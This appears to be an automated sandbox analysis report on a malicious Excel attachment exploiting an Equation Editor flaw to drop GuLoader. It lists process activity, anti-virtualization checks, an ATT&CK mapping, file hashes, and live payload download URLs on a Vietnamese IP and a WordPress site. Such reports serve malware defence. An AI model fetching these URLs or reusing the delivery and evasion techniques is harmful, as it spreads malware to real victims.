Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: new order requirment-21 July.xlsx

Stream path 'EncryptedPackage' entropy: 7.99879866952 (max. 8.0)

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F2407	6_2_002F2407
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F207C	6_2_002F207C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F7CB7	6_2_002F7CB7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F40EF	6_2_002F40EF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F04C0	6_2_002F04C0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F293F	6_2_002F293F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F2567	6_2_002F2567
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F6D5C	6_2_002F6D5C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F21DB	6_2_002F21DB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F05D8	6_2_002F05D8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F0626	6_2_002F0626
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F8605	6_2_002F8605
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F7EB4	6_2_002F7EB4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3EB2	6_2_002F3EB2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F06E2	6_2_002F06E2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F06D2	6_2_002F06D2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F4345	6_2_002F4345
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F8B51	6_2_002F8B51
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3FA8	6_2_002F3FA8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F37A5	6_2_002F37A5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3FE9	6_2_002F3FE9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3FC2	6_2_002F3FC2

Source: C:\Users\Public\vbc.exe

Code function: 6_2_002F2407 rdtsc

6_2_002F2407

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1952

Thread sleep time: -180000s >= -30000s

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 6_2_002F2407 rdtsc

6_2_002F2407

Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F5022 mov eax, dword ptr fs:[00000030h]	6_2_002F5022
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F70BE mov eax, dword ptr fs:[00000030h]	6_2_002F70BE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F7CB7 mov eax, dword ptr fs:[00000030h]	6_2_002F7CB7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F293F mov eax, dword ptr fs:[00000030h]	6_2_002F293F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3147 mov eax, dword ptr fs:[00000030h]	6_2_002F3147
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F6B34 mov eax, dword ptr fs:[00000030h]	6_2_002F6B34

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Jump to behavior

Source: vbc.exe, 00000006.00000002.2351769276.0000000000860000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000006.00000002.2351769276.0000000000860000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.2351769276.0000000000860000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\Public\vbc.exe

Code function: 6_2_002F69D7 cpuid

6_2_002F69D7

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution12	Path Interception	Process Injection12	Masquerading111	OS Credential Dumping	Security Software Discovery21	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Extra Window Memory Injection1	Virtualization/Sandbox Evasion1	LSASS Memory	Virtualization/Sandbox Evasion1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information11	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol121	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Extra Window Memory Injection1	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery113	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
new order requirment-21 July.xlsx	31%	Virustotal		Browse
new order requirment-21 July.xlsx	28%	ReversingLabs	Document-OLE.Exploit.CVE-2018-0802

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	15%	Virustotal		Browse
C:\Users\Public\vbc.exe	15%	Virustotal		Browse

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://kinmirai.org/wp-content/bin_lOulvHP91.bip	0%	Avira URL Cloud	safe
http://180.214.239.39/service/.svchost.exe	7%	Virustotal		Browse
http://180.214.239.39/service/.svchost.exe	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://kinmirai.org/wp-content/bin_lOulvHP91.bip	true	Avira URL Cloud: safe	unknown
http://180.214.239.39/service/.svchost.exe	true	7%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.day.com/dam/1.0	DE6E00F3.emf.0.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
180.214.239.39	unknown	Viet Nam		135905	VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	451759
Start date:	21.07.2021
Start time:	08:29:26
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	new order requirment-21 July.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	2
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@4/19@0/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 53% Number of executed functions: 9 Number of non-executed functions: 53
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, vga.dll Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:30:01	API Interceptor	74x Sleep call for process: EQNEDT32.EXE modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
180.214.239.39	Booking Confirmation.xlsx	Get hash	malicious	Browse	180.214.239.39/network/.svchost.exe
	CMA-CGM BOOKING CONFIRMATION.xlsx	Get hash	malicious	Browse	180.214.239.39/disk/.svchost.exe
	MTIR21487610_0062180102_20210714081247.PDF.xlsx	Get hash	malicious	Browse	180.214.239.39/user/.svchost.exe
	MTIR21487610_0062180102_20210714081247.PDF.xlsx	Get hash	malicious	Browse	180.214.239.39/cpu/.svchost.exe
	Booking Confirmation.xlsx	Get hash	malicious	Browse	180.214.239.39/port/.svchost.exe
	6306093940.xlsx	Get hash	malicious	Browse	180.214.239.39/ssh/.svchost.exe
	6306093940.xlsx	Get hash	malicious	Browse	180.214.239.39/mssn/.svchost.exe

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	SKM_C258201001130020005057R1RE.jar	Get hash	malicious	Browse	103.133.104.124
	Booking Confirmation.xlsx	Get hash	malicious	Browse	180.214.239.39
	RFQ- 7075-T6 ( PLASTIC MOULD POLY INDUSTRIES 02993 INQUIRE).xlsx	Get hash	malicious	Browse	180.214.236.151
	shipping document.xlsx	Get hash	malicious	Browse	103.140.250.43
	DHL 07988 AWB 202107988.xlsx	Get hash	malicious	Browse	180.214.236.151
	CMA-CGM BOOKING CONFIRMATION.xlsx	Get hash	malicious	Browse	180.214.239.39
	SO-19844 EIDCO.ppam	Get hash	malicious	Browse	103.141.137.204
	qHuGyYm6MV.exe	Get hash	malicious	Browse	103.133.104.146
	INV 2429.xlsx	Get hash	malicious	Browse	180.214.236.151
	PROFORMA_INVOICE.xlsx	Get hash	malicious	Browse	103.140.250.43
	MTIR21487610_0062180102_20210714081247.PDF.xlsx	Get hash	malicious	Browse	180.214.239.39
	kung.xlsx	Get hash	malicious	Browse	103.140.250.43
	kung.xlsx	Get hash	malicious	Browse	103.140.250.43
	SYHPpy5x6D.exe	Get hash	malicious	Browse	103.133.104.146
	Swift.xlsx	Get hash	malicious	Browse	103.133.104.146
	S&P-RFQ #2004668.xlsx	Get hash	malicious	Browse	180.214.236.151
	NEW ORDER.xlsx	Get hash	malicious	Browse	103.140.250.43
	MTIR21487610_0062180102_20210714081247.PDF.xlsx	Get hash	malicious	Browse	180.214.239.39
	Booking Confirmation.xlsx	Get hash	malicious	Browse	180.214.239.39
	kung.xlsx	Get hash	malicious	Browse	103.140.250.43

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	246888
Entropy (8bit):	4.635501230509535
Encrypted:	false
SSDEEP:	3072:MtU2Qf98DH332/jEvQuUZZNzPmhd3QPBP:KU2Qf9iXm/jduUNzPKNC
MD5:	19CAC1EE3A6E5E9F83054616F5D5CE6F
SHA1:	5B7F16098760F887B0BDC5FEE9223D022E0597FB
SHA-256:	3709110CC04E0EAFFE10BEC5E8A5C82B858BEE4195975E7BCD30C50B246F56C3
SHA-512:	75D7CC20B44224AB616B9D4E6EDD2C527C4245F5752430A08ED7A68A3D1596BFE5F9A16A447A57E8CBBE965B7377C6259F481C6A1AE8D262238AD25DCE14A0AD
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe, Author: Joe Security
Antivirus:	Antivirus: Virustotal, Detection: 15%, Browse
Reputation:	low
IE Cache URL:	http://180.214.239.39/service/.svchost.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L.....QU.................0...p......0........@....@.................................bq......................................T0..(....P...T..........P.......................................................(... ....................................text....$.......0.................. ..`.data........@.......@..............@....rsrc....T...P...`...P..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1932524.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	94963
Entropy (8bit):	7.9700481154985985
Encrypted:	false
SSDEEP:	1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
MD5:	17EC925977BED2836071429D7B476809
SHA1:	7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
SHA-256:	83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
SHA-512:	3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.\|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\37B1DE58.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	7608
Entropy (8bit):	5.072870897413844
Encrypted:	false
SSDEEP:	96:+SIe1L6BGj/MQU8DbwiMOtWmVz76F2MqdTfOYL/xRp7uGkmrI:5IojU+H3tWa6WdTfOYLpR8d
MD5:	43CF62101F3FFAF6D31E0D5F37C30007
SHA1:	03AC28698404188E7543EB03EB00689824BD2646
SHA-256:	C21D151DCE306D1A3A1D0AC20EFB0C67D45084C6A8A937C35366559AF9A6BAA4
SHA-512:	BB9A017BFA2E3D6BC8A82B78A8F737B0B8FEE042BA4386E40736EF87B61B621F885E1C018CC6CFE4F87BF78D3C71A027848E8D6548FCB374073139A4CDD1C4C7
Malicious:	false
Reputation:	low
Preview:	....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................D.6.).X...0.u.d...................$........p....\...$.......$..........p....$....6Pv...p....`..p..D.$y.vX...........H......v....$.....l.d............^.p.....^.p`...X...........-...t....<.v................<.>v.Z.v....X..m......D........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\39F9BEF.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11303
Entropy (8bit):	7.909402464702408
Encrypted:	false
SSDEEP:	192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
MD5:	9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1:	E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256:	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512:	81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...\|.e............{......z.Y8..DiE.46.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=\|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p\|f6.^._.c..'''Qll..........W.[..s..q+e.:.\|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3BACCE26.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
Category:	dropped
Size (bytes):	62140
Entropy (8bit):	7.529847875703774
Encrypted:	false
SSDEEP:	1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
MD5:	722C1BE1697CFCEAE7BDEFB463265578
SHA1:	7D300A2BAB951B475477FAA308E4160C67AD93A9
SHA-256:	2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
SHA-512:	2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\437A52B0.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	94963
Entropy (8bit):	7.9700481154985985
Encrypted:	false
SSDEEP:	1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
MD5:	17EC925977BED2836071429D7B476809
SHA1:	7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
SHA-256:	83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
SHA-512:	3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.\|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4775DAD2.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
Category:	dropped
Size (bytes):	62140
Entropy (8bit):	7.529847875703774
Encrypted:	false
SSDEEP:	1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
MD5:	722C1BE1697CFCEAE7BDEFB463265578
SHA1:	7D300A2BAB951B475477FAA308E4160C67AD93A9
SHA-256:	2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
SHA-512:	2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
Malicious:	false
Preview:	......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\55C93AD5.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\69375A79.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

